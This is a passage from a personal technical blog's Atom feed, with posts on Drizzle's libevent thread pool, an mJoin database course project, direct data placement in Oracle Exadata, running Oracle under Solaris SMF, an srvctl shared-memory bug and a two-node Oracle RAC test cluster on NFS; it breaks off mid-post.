When it comes to the thread pool code, Brian also points out that the current design does not use libevent in the most optimal manner. He says &quot;When it comes to pool of threads I think the current design misses the point of using libevent. Currently it does not yield on IO block, so in essence all it is doing it keeping you from overwhelming the operating system's scheduler and providing a completion for a given action. For small queries this is fine, but for longer running queries this is not very good (though... most queries we see are pretty short so this part is not a huge concern). It needs to be redesigned to make better use of IO, and this is something we will work on soon&quot;. As an example of how another multi-threaded application uses libevent, it's interesting to look at how &lt;a href=&quot;http://www.danga.com/memcached/&quot; target=&quot;_blank&quot;&gt;memcached&lt;/a&gt; uses it. Steven Grimm gives a brief outline in this &lt;a href=&quot;http://monkeymail.org/archives/libevent-users/2007-January/000450.html&quot; target=&quot;_blank&quot;&gt;thread&lt;/a&gt; of how he implemented thread support in memcached. I know Brian is currently working on a multi-threaded scheduler for Drizzle which is almost complete. He has mentioned in the past that there is a need to design a scheduler which really understands the difference between high/low and time constrained queries. I believe this is an interesting issue to think about.&lt;br&gt;

In future posts, I hope to investigate the thread pool code more. In particular, I'd like to see how libevent could be used in a more optimal way and talk about some of the design considerations for a cost-based scheduler. Also, if I have time, I hope to write about how a query is processed in Drizzle i.e. what happens after connection handling.&lt;br&gt;
</content>
 </entry>
 
 <entry>
   <title>Semester Project</title>
   <link href="http://posulliv.github.com/2009/02/20/semester-project"/>
   <updated>2009-02-20T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/02/20/semester-project</id>
   <content type="html">&lt;p&gt;This semester I&amp;#8217;m taking a &lt;a href='http://www.cs.umd.edu/class/spring2009/cmsc724/' target='_blank'&gt;course&lt;/a&gt; in database management systems. For this course, we have to work on a mini-research project in groups. I&amp;#8217;m in a group with 2 other students and the project we decided on was to perform an experimental evaluation of the &lt;a href='http://www.vldb.org/conf/2003/papers/S10P01.pdf' target='_blank'&gt;mJoin&lt;/a&gt; operator. This will involve surveying the prior work on the mJoin operator and performing an implementation of the operator in an open-source DBMS.&lt;/p&gt;

&lt;p&gt;The mJoin operator is essentially an n-ary symmetric hash join operator. For each relation to be joined, a hash table is built on each join attribute. Then for each new tuple, it is inserted into the appropriate hash table(s) and a probe is performed into the hash tables on the other relations. Intermediate tuples are never stored anywhere. One of the issues we will be investigating in this experimental evaluation is whether an operator like the mJoin is more or less efficient than a tree of binary joins. Conventional wisdom says that a tree of binary joins is typically more efficient.&lt;/p&gt;

&lt;p&gt;The first thing we will be doing in the next week or two is looking at various open-source databases and seeing which one would be most suited for this project. Basically, the main criteria will be how easy the runtime engine is to work with and how easy it will be to add a new operator. We&amp;#8217;ll have a look at a lot of databases but at the moment, it&amp;#8217;s looking like PostgreSQL is the one we will work with for the semester. We&amp;#8217;ll also be looking into any related work. The &lt;a href='http://www.cs.umd.edu/~amol/papers/fnt-aqp.pdf' target='_blank'&gt;survey&lt;/a&gt; on adaptive query processing looks like a good starting point for this.&lt;/p&gt;

&lt;p&gt;Some other interesting aspects of the mJoin operator which we hope to investigate are: &lt;ul&gt;
	&lt;li&gt;query optimization with the mJoin operator&lt;/li&gt;
	&lt;li&gt;what applications would benefit from an operator such as this&lt;/li&gt;
	&lt;li&gt;what kind of scenarios is the operator suited for (and not suited for)&lt;/li&gt;
	&lt;li&gt;how difficult it is to add the operator to an existing DBMS&lt;/li&gt;
&lt;/ul&gt; I&amp;#8217;ll try to post regularly throughout the semester on what we are up to and provide updates on what kind of progress we are making. In the meantime, besides working on this project, I&amp;#8217;m trying to contribute to &lt;a href='https://launchpad.net/drizzle' target='_blank'&gt;Drizzle&lt;/a&gt; in as many ways as I possibly can. I&amp;#8217;m mostly working on small bugs and performing some code cleanup tasks.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Drizzle: A Pretty Cool Project</title>
   <link href="http://posulliv.github.com/2009/01/28/drizzle-a-pretty-cool-project"/>
   <updated>2009-01-28T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/01/28/drizzle-a-pretty-cool-project</id>
<content type="html">&lt;a href=&quot;https://launchpad.net/drizzle&quot;&gt;Drizzle&lt;/a&gt; is a pretty cool project whose progress I've started following in the last few weeks. I'm trying to contribute in a tiny way if I can by confirming bug reports. If I had more time, I'd like to try resolving some bugs. Hopefully, I'll find some spare time to do that in the future.&lt;br /&gt;&lt;br /&gt;I think it's definitely a project worth keeping an eye on though. Check it out if you have the time.
</content>
 </entry>
 
 <entry>
   <title>What is Direct Data Placement</title>
   <link href="http://posulliv.github.com/2009/01/06/what-is-direct-data-placement"/>
   <updated>2009-01-06T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2009/01/06/what-is-direct-data-placement</id>
   <content type="html">&lt;p&gt;I&amp;#8217;m currently studying Oracle&amp;#8217;s &lt;a href='http://www.oracle.com/technology/products/bi/db/exadata/pdf/exadata-technical-whitepaper.pdf'&gt;white paper&lt;/a&gt; on Exadata and came across the following paragraph:&lt;/p&gt;

&lt;p&gt;&amp;#8220;Further, Oracle&amp;#8217;s interconnect protocol uses direct data placement (DMA - direct memory access) to ensure very low CPU overhead by directly moving data from the wire to database buffers with no extra data copies being made.&amp;#8221;&lt;/p&gt;

&lt;p&gt;This got me wondering what direct data placement is. First off, the interconnect protocol which Oracle uses in Exadata is &lt;a href='http://oss.oracle.com/projects/rds/'&gt;Reliable Datagram Sockets&lt;/a&gt; (RDSv3). The iDB (intelligent database protocol) that a database server and Exadata Storage Server software use to communicate is built on RDSv3.&lt;/p&gt;

&lt;p&gt;Now, I found some information on direct data placement in a number of RFCs: &lt;a href='http://www.ietf.org/rfc/rfc4296.txt'&gt;RFC 4296&lt;/a&gt;, &lt;a href='http://tools.ietf.org/html/rfc4297'&gt;RFC 4297&lt;/a&gt;, and &lt;a href='http://www.apps.ietf.org/rfc/rfc5041.html'&gt;RFC 5041&lt;/a&gt;. Of the 3 RFCs, I found RFC 5041 (Direct Data Placement over Reliable Transports) to be the most relevant (although they are all worth a quick look). RFC 5041 sums up direct data placement quite nicely:&lt;/p&gt;

&lt;p&gt;&amp;#8220;Direct Data Placement Protocol (DDP) enables an Upper Layer Protocol (ULP) to send data to a Data Sink without requiring the Data Sink to Place the data in an intermediate buffer - thus, when the data arrives at the Data Sink, the network interface can place the data directly into the ULP&amp;#8217;s buffer.&amp;#8221;&lt;/p&gt;

&lt;p&gt;The paragraph from Oracle&amp;#8217;s white paper makes much more sense to me now after briefly reading through the RFC. Since each InfiniBand link in Exadata provides 16 Gb of bandwidth, there would be a large amount of overhead if data had to be placed in an intermediate buffer. Thus, the use of direct data placement makes perfect sense since it reduces CPU overhead associated with copying data through intermediate buffers.&lt;/p&gt;

&lt;p&gt;Also, I believe that in the paragraph quoted from Oracle&amp;#8217;s white paper, it should read RDMA, for Remote Direct Memory Access.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Semester Project Finally Finished</title>
   <link href="http://posulliv.github.com/2008/12/16/semester-project-finally-finished"/>
   <updated>2008-12-16T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/12/16/semester-project-finally-finished</id>
   <content type="html">&lt;p&gt;We just finished our semester project yesterday for the class I am taking on High Performance Computing. It was a pretty interesting project based on the topic of software fault injection.&lt;/p&gt;

&lt;p&gt;More details can be found in the project report &lt;a href='http://www.ece.umd.edu/%7Eposulliv/714_fault_injection_writeup_final.pdf'&gt;here&lt;/a&gt;.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Configuring Oracle as a Service in SMF</title>
   <link href="http://posulliv.github.com/2008/11/30/configuring-oracle-as-a-service-in-smf"/>
   <updated>2008-11-30T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/30/configuring-oracle-as-a-service-in-smf</id>
<content type="html">In Solaris 10, Sun introduced the Service Management Facility (SMF) to simplify the management of system services. It is a component of the so-called Predictive Self-Healing technology available in Solaris 10; the other component is the Fault Management Architecture.&lt;br&gt;

In this post, I will demonstrate how to configure an Oracle database and listener as services managed by SMF. This means that Oracle will start automatically on boot, so we don't need to go to the bother of writing a startup script for Oracle (even though it's not really that hard; see the &lt;a href=&quot;http://www.dizwell.com/prod/node/235?page=0%2C2&quot;&gt;10gR2 installation guide on Solaris&lt;/a&gt; by Howard Rogers for an example). A traditional startup script could still be created and placed in the appropriate &lt;code&gt;/etc/rc*.d&lt;/code&gt; directory. These scripts are referred to as legacy run services in Solaris 10 and will not benefit from the precise fault management provided by SMF.&lt;br&gt;

In this post, I am only talking about a single-instance environment and I am not using ASM for storage. Also, please note that this post is not an extensive guide by any means; it's just a short post on how to get things working. For more information on SMF and Solaris 10 in general, have a look through Sun's excellent online documentation at &lt;a href=&quot;http://docs.sun.com/&quot;&gt;http://docs.sun.com&lt;/a&gt;.&lt;br&gt;

&lt;span style=&quot;font-weight: bold;&quot;&gt;Adding Oracle as a Service&lt;/span&gt;&lt;br&gt;

To create a new service in SMF, a number of steps need to be performed (see the &lt;a href=&quot;http://www.sun.com/bigadmin/content/selfheal/sdev_intro.html&quot;&gt;Solaris Service Management Facility - Service Developer Introduction&lt;/a&gt; for more details). Luckily for me, Joost Mulders has already done all the necessary work for Oracle. The package for installing ora-smf is available from &lt;a href=&quot;http://joostm.nl/solaris/smf/ora-smf/ora-smf-1.5.pkg&quot;&gt;here&lt;/a&gt;.&lt;br&gt;

To install this package, download it to an appropriate location (in my case, the root user's home directory) and perform the following:&lt;br&gt;

&lt;pre&gt;
# cd /var/svc/manifest/application
# mkdir database
# cd ~
# pkgadd -d ora-smf-1.5.pkg
&lt;/pre&gt;

There is now some configuration which needs to be performed. Navigate to the /var/svc/manifest/application/database directory. The following files will be present there:

&lt;pre&gt;
# ls -l
-r--r--r--   1 root     bin         2167 Apr 26 09:24 oracle-database-instance.xml
-r--r--r--   1 root     bin         5722 Dec 28  2005 oracle-database-service.xml
-r--r--r--   1 root     bin         2128 Apr 26 09:31 oracle-listener-instance.xml
-r--r--r--   1 root     bin         4295 Dec 28  2005 oracle-listener-service.xml
#
&lt;/pre&gt;

The two files which must be edited are:
&lt;ul&gt;
	&lt;li&gt;oracle-database-instance.xml&lt;/li&gt;
	&lt;li&gt;oracle-listener-instance.xml&lt;/li&gt;
&lt;/ul&gt;
My &lt;code&gt;oracle-database-instance.xml&lt;/code&gt; file looked like the following after I edited it according to my environment:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/288466.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

and my &lt;code&gt;oracle-listener-instance.xml&lt;/code&gt; file looked like so after editing:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/288469.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

In the above configuration files, you can see that I have an instance (orcl1) whose ORACLE_HOME is &lt;code&gt;/u01/app/oracle/product/10.2.0/db_1&lt;/code&gt;. I also have a resource project named oracle, and the user and group which the Oracle software is installed as are oracle and dba, respectively. The most important parameters which must be changed according to your environment are:

&lt;ul&gt;
	&lt;li&gt;ORACLE_HOME&lt;/li&gt;
	&lt;li&gt;ORACLE_SID&lt;/li&gt;
	&lt;li&gt;User&lt;/li&gt;
	&lt;li&gt;Group&lt;/li&gt;
	&lt;li&gt;Project&lt;/li&gt;
	&lt;li&gt;Working Directory (in my case, I set it to the same value as ORACLE_HOME)&lt;/li&gt;
	&lt;li&gt;Instance name (needs to be the same as the ORACLE_SID for the database and the listener name for the listener)&lt;/li&gt;
&lt;/ul&gt;

Once these modifications have been performed according to your environment, execute the following to bring the database and listener under SMF control:

&lt;pre&gt;
# svccfg import /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg import /var/svc/manifest/application/database/oracle-listener-instance.xml
&lt;/pre&gt;

Now, shut down the database and listener on the host (this post presumes you are only configuring one database and one listener, though it shouldn't be too difficult to configure multiple instances). Then execute the following to enable the database and listener as SMF services and start them:

&lt;pre&gt;
# svcadm enable svc:/application/oracle/database:orcl1
# svcadm enable svc:/application/oracle/listener:LISTENER
&lt;/pre&gt;
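
At this point, &lt;code&gt;svcs&lt;/code&gt; should report both services as online (output illustrative):

&lt;pre&gt;
# svcs | grep oracle
online         10:15:03 svc:/application/oracle/database:orcl1
online         10:15:10 svc:/application/oracle/listener:LISTENER
&lt;/pre&gt;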

In the commands above, the database instance is orcl1 and the listener name is LISTENER. Logs of this process are available in the /var/svc/log directory.

&lt;pre&gt;
# cd /var/svc/log
# ls -ltr application-*
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-management-webmin:default.log
-rw-r--r--   1 root     root         120 Apr 25 20:15 application-print-server:default.log
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-print-ipp-listener:default.log
-rw-r--r--   1 root     root          75 Apr 25 20:16 application-gdm2-login:default.log
-rw-r--r--   1 root     root         566 Apr 26 07:07 application-print-cleanup:default.log
-rw-r--r--   1 root     root         603 Apr 26 07:07 application-font-fc-cache:default.log
-rw-r--r--   1 root     root        3318 Apr 26 10:45 application-oracle-database:orcl1.log
-rw-r--r--   1 root     root        6847 Apr 26 10:47 application-oracle-listener:LISTENER.log
#
&lt;/pre&gt;

&lt;span style=&quot;font-weight: bold;&quot;&gt;Testing Out SMF&lt;/span&gt;&lt;br&gt;

Now, to test out some of the functionality of SMF, I'm going to kill the pmon process of the orcl1 database instance. SMF should automatically restart the instance.

&lt;pre&gt;
# ps -ef | grep pmon
oracle  5113     1   0 10:19:22 ?           0:01 ora_pmon_orcl1
# kill -9 5113
&lt;/pre&gt;

Roughly 10 to 20 seconds later, the database came back up. Looking at the &lt;code&gt;application-oracle-database:orcl1.log&lt;/code&gt; file, we can see what happened:

&lt;pre&gt;
[ Apr 26 10:44:52 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:44:52 Executing stop method (&quot;/lib/svc/method/ora-smf stop database orcl1&quot;)]
**********************************************************************
********************************************************************** 
some of '^ora_(lgwr|dbw0|smon|pmon|reco|ckpt)_orcl1' died.
** Aborting instance orcl1.
*********************************************************************
*********************************************************************
ORACLE instance shut down.
[ Apr 26 10:44:53 Method &quot;stop&quot; exited with status 0 ]
[ Apr 26 10:44:53 Executing start method (&quot;/lib/svc/method/ora-smf start database orcl1&quot;) ]
ORACLE instance started.
Total System Global Area  251658240 bytes
Fixed Size                  1279600 bytes
Variable Size              83888528 bytes
Database Buffers          163577856 bytes
Redo Buffers                2912256 bytes
Database mounted.
Database opened.
database orcl1 is OPEN.
[ Apr 26 10:45:05 Method &quot;start&quot; exited with status 0 ]
&lt;/pre&gt;

As can be seen from the content of my log file above, SMF discovered that the instance crashed and restarted it automatically. That seems pretty cool to me!&lt;br&gt;

Now, let's try out the same procedure with the listener service.&lt;br&gt;
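
This time, we kill the listener process (the PID shown is just illustrative):

&lt;pre&gt;
# ps -ef | grep tnslsnr
oracle  5200     1   0 10:46:30 ?        0:00 /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr LISTENER -inherit
# kill -9 5200
&lt;/pre&gt;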


Almost instantaneously, the listener came back up. Looking through the &lt;code&gt;application-oracle-listener:LISTENER.log&lt;/code&gt; file shows us what SMF did:

&lt;pre&gt;
[ Apr 26 10:47:50 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:47:50 Executing stop method (&quot;/lib/svc/method/ora-smf stop listener LISTENER&quot;) ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:51

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
[ Apr 26 10:47:52 Method &quot;stop&quot; exited with status 0 ]
[ Apr 26 10:47:52 Executing start method (&quot;/lib/svc/method/ora-smf start listener LISTENER&quot;) ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:52

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
Start Date                26-APR-2007 10:47:54
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))
Services Summary...
Service &quot;PLSExtProc&quot; has 1 instance(s).
Instance &quot;PLSExtProc&quot;, status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
listener LISTENER start succeeded
[ Apr 26 10:47:54 Method &quot;start&quot; exited with status 0 ]
&lt;/pre&gt;

I haven't really played around with much else in SMF and Oracle at the moment. Obviously, Oracle has a lot of this functionality already available through Enterprise Manager using corrective actions.&lt;br&gt;

Also, it's worth pointing out that Oracle does not currently support SMF and does not provide any information or documentation on configuring Oracle with SMF. Metalink Note 398580.1 and Bug 5340239 have more information on this from Oracle.
</content>
 </entry>
 
 <entry>
   <title>srvctl Error in Solaris 10 RAC Environment</title>
   <link href="http://posulliv.github.com/2008/11/29/srvctl-error-in-solaris-10-rac-environment"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/srvctl-error-in-solaris-10-rac-environment</id>
<content type="html">&lt;p&gt;If you install a RAC environment on Solaris 10 and set kernel parameters using resource control projects (the recommended method in Solaris 10), then you will likely run into issues when trying to start the cluster database or an individual instance using the &lt;code&gt;srvctl&lt;/code&gt; utility. This is the kind of error you will encounter:&lt;/p&gt;
&lt;pre&gt;
$ srvctl start instance -d orclrac -i orclrac2
PRKP-1001 : Error starting instance orclrac2 on node nap-rac02
CRS-0215: Could not start resource 'ora.orclrac.orclrac2.inst'.
$
&lt;/pre&gt;
&lt;p&gt;along with the following messages in the alert log&lt;/p&gt;
&lt;pre&gt;
Tue Apr 24 11:36:21 2007
Starting ORACLE instance (normal)
Tue Apr 24 11:36:21 2007
WARNING: EINVAL creating segment of size 0x0000000024802000
fix shm parameters in /etc/system or equivalent
&lt;/pre&gt;
&lt;p&gt;This is because the &lt;code&gt;srvctl&lt;/code&gt; utility does not pick up the shared memory settings from the resource control project (i.e. via &lt;code&gt;prctl&lt;/code&gt;); it reads the settings from the &lt;code&gt;/etc/system&lt;/code&gt; file instead. This is documented in bug 5340239 on Metalink.&lt;/p&gt;

&lt;p&gt;The only workaround for this at the moment (that I know of) is to manually add the necessary shm parameters to the &lt;code&gt;/etc/system&lt;/code&gt; file, for example:&lt;/p&gt;
&lt;pre&gt;
set semsys:seminfo_semmni=100
set semsys:seminfo_semmsl=256
set shmsys:shminfo_shmmax=4294967295
set shmsys:shminfo_shmmni=100
&lt;/pre&gt;</content>
 </entry>
 
 <entry>
   <title>Oracle 10gR2 RAC with Solaris 10 and NFS</title>
   <link href="http://posulliv.github.com/2008/11/29/oracle-10gr2-rac-with-solaris-10-and-nfs"/>
   <updated>2008-11-29T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/29/oracle-10gr2-rac-with-solaris-10-and-nfs</id>
<content type="html">Recently, I set up a 2-node RAC environment for testing using Solaris 10 and NFS. The environment consisted of 2 RAC nodes running Solaris 10 and a Solaris 10 server which served as my NFS filer.
&lt;br&gt;

I thought it might prove useful to write a post on how this is achieved, as I found it to be a relatively quick way to set up a cheap test RAC environment. Obviously, this setup is not supported by Oracle and should only be used for development and testing purposes.
&lt;br&gt;

This post will only detail the steps which are specific to this setup, meaning I won't talk about a number of steps which need to be performed, such as setting up user equivalence and creating the database. I will mention when these steps should be performed, but I point you to &lt;a href=&quot;http://www.oracle.com/technology/pub/articles/hunter_rac10gr2_iscsi.html&quot;&gt;Jeffrey Hunter's article&lt;/a&gt; on building a 10gR2 RAC on Linux with iSCSI for more information on steps like these.

&lt;h2&gt;Overview of the Environment&lt;/h2&gt;

Here is a diagram of the architecture used which is based on Jeff Hunter's diagram from the previously mentioned article (click on the image to get a larger view):
&lt;br&gt;

&lt;a href=&quot;../../../images/rac2.jpg&quot;&gt;&lt;img style=&quot;270px;&quot; src=&quot;../../../images/rac2.jpg&quot; border=&quot;0&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;
&lt;br&gt;

You can see that I am using an external hard drive attached to the NFS filer for storage. This external hard drive will hold all my database and Clusterware files.
&lt;br&gt;

Again, the hardware used is the exact same as the hardware used in Jeff Hunter's article. Notice however that I do not have a public interface configured for my NFS filer. This is mainly because I did not have any spare network interfaces lying around for me to use!

&lt;h2&gt;Getting Started&lt;/h2&gt;

To get started, we will install Solaris 10 for the x86 architecture on all three machines. The ISO images for Solaris 10 x86 can be downloaded from Sun's website &lt;a href=&quot;http://www.sun.com/software/solaris/get.jsp&quot;&gt;here&lt;/a&gt;. You will need a Sun Online account to access the downloads but registration is free and painless.
&lt;br&gt;

I won't be covering the Solaris 10 installation process here but for more information, I refer you to the official Sun basic installation guide found &lt;a href=&quot;http://docs.sun.com/app/docs/doc/817-0544/6mgbagb19?a=view&quot;&gt;here&lt;/a&gt;.
&lt;br&gt;

When installing Solaris 10, make sure that you configure both network interfaces. Ensure that you do not use DHCP for either network interface and specify all the necessary details for your environment.
&lt;br&gt;

After installation, you should update the &lt;code&gt;/etc/inet/hosts&lt;/code&gt; file on all hosts. For my environment as shown in the diagram above, my &lt;code&gt;hosts&lt;/code&gt; file looked like the following:

&lt;pre&gt;
#
# Internet host table
#
127.0.0.1 localhost

# Public Network - (pcn0)
172.16.16.27 solaris1
172.16.16.28 solaris2

# Private Interconnect - (pcn1)
192.168.2.111 solaris1-priv
192.168.2.112 solaris2-priv

# Public Virtual IP (VIP) addresses for - (pcn0)
172.16.16.31 solaris1-vip
172.16.16.32 solaris2-vip

# NFS Filer - (pcn1)
192.168.2.195 solaris-filer
&lt;/pre&gt;
&lt;br&gt;
The network settings on the RAC nodes will need to be adjusted as they can affect cluster interconnect transmissions. The UDP parameters which need to be modified on Solaris are &lt;code&gt;udp_recv_hiwat&lt;/code&gt; and &lt;code&gt;udp_xmit_hiwat&lt;/code&gt;. The default values for these parameters on Solaris 10 are 57344 bytes. Oracle recommends that these parameters are set to at least 65536 bytes.
&lt;br&gt;

To see what these parameters are currently set to, perform the following:

&lt;pre&gt;
# ndd /dev/udp udp_xmit_hiwat
57344
# ndd /dev/udp udp_recv_hiwat
57344
&lt;/pre&gt;
&lt;br&gt;
To set the values of these parameters to 65536 bytes in current memory, perform the following:

&lt;pre&gt;
# ndd -set /dev/udp udp_xmit_hiwat 65536
# ndd -set /dev/udp udp_recv_hiwat 65536
&lt;/pre&gt;
&lt;br&gt;
Now, we obviously want these parameters to be set to these values when the system boots. The official Oracle documentation is incorrect when it states that the parameters are set on boot when they are placed in the &lt;code&gt;/etc/system&lt;/code&gt; file. Values placed in &lt;code&gt;/etc/system&lt;/code&gt; have no effect on Solaris 10; bug 5237047 has more information on this.
&lt;br&gt;

So what we will do is create a startup script called &lt;code&gt;udp_rac&lt;/code&gt; in &lt;code&gt;/etc/init.d&lt;/code&gt;. This script has the following contents:

&lt;pre&gt;
#!/sbin/sh
case &quot;$1&quot; in
'start')
ndd -set /dev/udp udp_xmit_hiwat 65536
ndd -set /dev/udp udp_recv_hiwat 65536
;;
'state')
ndd /dev/udp udp_xmit_hiwat
ndd /dev/udp udp_recv_hiwat
;;
*)
echo &quot;Usage: $0 { start | state }&quot;
exit 1
;;
esac
&lt;/pre&gt;
&lt;br&gt;
Now, we need to create a link to this script in the &lt;code&gt;/etc/rc3.d&lt;/code&gt; directory:

&lt;pre&gt;
# ln -s /etc/init.d/udp_rac /etc/rc3.d/S86udp_rac
&lt;/pre&gt;
&lt;br&gt;
&lt;h2&gt;Configuring the NFS Filer&lt;/h2&gt;

Now that we have Solaris installed on all our machines, it's time to start configuring our NFS filer. As I mentioned before, I will be using an external hard drive for storing all my database files and Clusterware files. If you're not using an external hard drive, you can ignore the next paragraph.
&lt;br&gt;

In my &lt;a
href=&quot;http://posulliv.github.com/2008/11/29/creating-a-ufs-file-system-on-an-external-hard-drive-with-solaris-10.html&quot;&gt;previous post&lt;/a&gt;, I talked about creating a UFS file system on an external hard drive in Solaris 10. I am going to be following that post exactly. So if you perform what I mention in that post, you will have a UFS file system ready for mounting.
&lt;br&gt;

Now, I have a UFS file system created on the &lt;code&gt;/dev/dsk/c2t0d0s0&lt;/code&gt; device. I will create a directory for mounting this file system and then mount it:

&lt;pre&gt;
# mkdir -p /export/rac
# mount -F ufs /dev/dsk/c2t0d0s0 /export/rac
&lt;/pre&gt;
&lt;br&gt;
Now that we have created the base directory, let's create the directories inside it which will contain the various files for our RAC environment.

&lt;pre&gt;
# cd /export/rac
# mkdir crs_files
# mkdir oradata
&lt;/pre&gt;
&lt;br&gt;
The &lt;code&gt;/export/rac/crs_files&lt;/code&gt; directory will contain the OCR and the voting disk files used by Oracle Clusterware. The &lt;code&gt;/export/rac/oradata&lt;/code&gt; directory will contain all the Oracle data files, control files, redo logs and archive logs for the cluster database.
&lt;br&gt;

Obviously, this setup is not ideal since everything is on the same device. For setting up this environment, I didn't care. All I wanted to do was get a quick RAC environment up and running and show how easily it can be done with NFS. More care should be taken in the previous step but I'm lazy...
&lt;br&gt;

Now we need to make these directories accessible to the Oracle RAC nodes. I will be accomplishing this using NFS. We first need to edit the &lt;code&gt;/etc/dfs/dfstab&lt;/code&gt; file to specify which directories we want to share and what options we want to use when sharing them. The &lt;code&gt;dfstab&lt;/code&gt; file I configured looked like so:

&lt;pre&gt;
#       Place share(1M) commands here for automatic execution
#       on entering init state 3.
#
#       Issue the command 'svcadm enable network/nfs/server' to
#       run the NFS daemon processes and the share commands, after adding
#       the very first entry to this file.
#
#       share [-F fstype] [ -o options] [-d &quot;&quot;]  [resource]
#       .e.g,
#       share  -F nfs  -o rw=engineering  -d &quot;home dirs&quot;  /export/home2
share -F nfs -o rw,anon=175 /export/rac/crs_files
share -F nfs -o rw,anon=175 /export/rac/oradata
&lt;/pre&gt;
&lt;br&gt;
The &lt;code&gt;anon&lt;/code&gt; option in the &lt;code&gt;dfstab&lt;/code&gt; file, as shown above, is the user ID of the oracle user on the cluster nodes. This user ID should be the same on all nodes in the cluster.
&lt;br&gt;

After editing the &lt;code&gt;dfstab&lt;/code&gt; file, the NFS daemon process needs to be restarted. You can do this on Solaris 10 like so:

&lt;pre&gt;
# svcadm restart nfs/server
&lt;/pre&gt;

To check if the directories are exported correctly, the following can be performed from the NFS filer:

&lt;pre&gt;
# share
-               /export/rac/crs_files   rw,anon=175   &quot;&quot;
-               /export/rac/oradata     rw,anon=175   &quot;&quot;
#
&lt;/pre&gt;

The specified directories should now be accessible from the Oracle RAC nodes. To verify that these directories are accessible from the RAC nodes, run the following from both nodes (&lt;code&gt;solaris1&lt;/code&gt; and &lt;code&gt;solaris2&lt;/code&gt; in my case):

&lt;pre&gt;
# dfshares solaris-filer
RESOURCE                                  SERVER ACCESS    TRANSPORT
solaris-filer:/export/rac/crs_files    solaris-filer  -         -
solaris-filer:/export/rac/oradata      solaris-filer  -         -
#
&lt;/pre&gt;
&lt;br&gt;
The output should be the same on both nodes.

&lt;h2&gt;Configure NFS Exports on Oracle RAC Nodes&lt;/h2&gt;

Now we need to mount the NFS exports on the two nodes in the cluster. First, we must create the directories where we will be mounting the exports. In my case, I did this:

&lt;pre&gt;
# mkdir /u02
# mkdir /u03
&lt;/pre&gt;
&lt;br&gt;
I am not using &lt;code&gt;/u01&lt;/code&gt; as I'm using that directory for installing the Oracle software. I will not be configuring a shared Oracle home in this article as I wanted to keep things as simple as possible, but that might serve as a good future blog post.
&lt;br&gt;

For mounting the NFS exports, there are specific mount options which must be used with NFS in an Oracle RAC environment. The commands which I used to manually mount these exports are as follows:

&lt;pre&gt;
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/crs_files /u02
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/oradata /u03
&lt;/pre&gt;
&lt;br&gt;
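To confirm that the mount options actually took effect, &lt;code&gt;nfsstat -m&lt;/code&gt; can be run on each node; it reports the options in force for every NFS mount, which is a quick sanity check given how much options like &lt;code&gt;noac&lt;/code&gt; and &lt;code&gt;forcedirectio&lt;/code&gt; matter in a RAC environment:

&lt;pre&gt;
# nfsstat -m
&lt;/pre&gt;
&lt;br&gt;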
Obviously, we want these exports to be mounted at boot. This is accomplished by adding the necessary lines to the &lt;code&gt;/etc/vfstab&lt;/code&gt; file. The extra lines which I added to the &lt;code&gt;/etc/vfstab&lt;/code&gt; file on both nodes were (the output below did not come out very well originally so I had to split each line into 2 lines):

&lt;pre&gt;
